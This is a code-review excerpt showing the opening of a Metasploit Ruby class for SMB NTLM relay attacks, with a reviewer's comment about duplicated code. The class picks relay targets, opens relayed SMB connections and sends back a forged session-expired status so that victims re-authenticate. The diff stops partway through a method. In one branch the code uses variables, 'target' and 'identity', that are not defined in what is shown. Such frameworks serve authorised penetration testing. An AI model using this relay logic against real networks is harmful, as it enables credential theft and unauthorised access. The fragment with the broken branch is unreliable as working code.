lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb

```diff
@@ -0,0 +1,366 @@
+module Msf::Exploit::Remote::SMB::Relay::NTLM
+  # This class represents a single connected client to the server. It stores and processes connection specific related
+  # information.
+  # Has overridden methods than allow smb relay attacks.
+  class ServerClient < ::RubySMB::Server::ServerClient
+
+    # The NT Status that will cause a client to reattempt authentication
+    FORCE_RETRY_SESSION_SETUP = ::WindowsError::NTStatus::STATUS_NETWORK_SESSION_EXPIRED
+
+    # @param [Msf::Exploit::Remote::SMB::Relay::TargetList] relay_targets Relay targets
+    # @param [Object] listener A listener that can receive on_relay_success/on_relay_failure events
+    def initialize(server, dispatcher, relay_timeout:, relay_targets:, listener:)
+      super(server, dispatcher)
+
+      @timeout = relay_timeout
+      @relay_targets = relay_targets
+      @relay_timeout = relay_timeout
+      @listener = listener
+    end
+
+    def do_tree_connect_smb2(request, session)
+      logger.print_status("Received request for #{session.metadata[:identity]}")
+
+      # Attempt to select the next target to relay to
+      session.metadata[:relay_target] = @relay_targets.next(session.metadata[:identity])
+      # If there's no more targets to relay to, just tree connect to the currently running server instead
+      if session.metadata[:relay_target].nil?
+        logger.print_status("identity: #{session.metadata[:identity]} - All targets relayed to")
+        return super(request, session)
+      end
+
+      logger.print_status("Relaying to next target #{display_target(session.metadata[:relay_target])}")
+      relayed_connection = create_relay_smb_client(
+        session.metadata[:relay_target],
+        @relay_timeout
+      )
+
+      if relayed_connection.nil?
+        @relay_targets.on_relay_end(target, identity: session.metadata[:identity], is_success: false)
+      end
+
+      session.metadata[:relay_mode] = true
+      session.metadata[:relayed_connection] = relayed_connection
+      session.state = :in_progress
+
+      response = RubySMB::SMB2::Packet::TreeConnectResponse.new
+      response.smb2_header.nt_status = FORCE_RETRY_SESSION_SETUP.value
+
+      response
+    end
+
+    def do_session_setup_smb2(request, session)
+      # TODO: Add shared helper for grabbing session lookups
```

Comment:
Not actioning as part of this PR; It's just highlighting that this code could exist as a shared callable method in ruby_smb, as it's duplicated here in this MVP release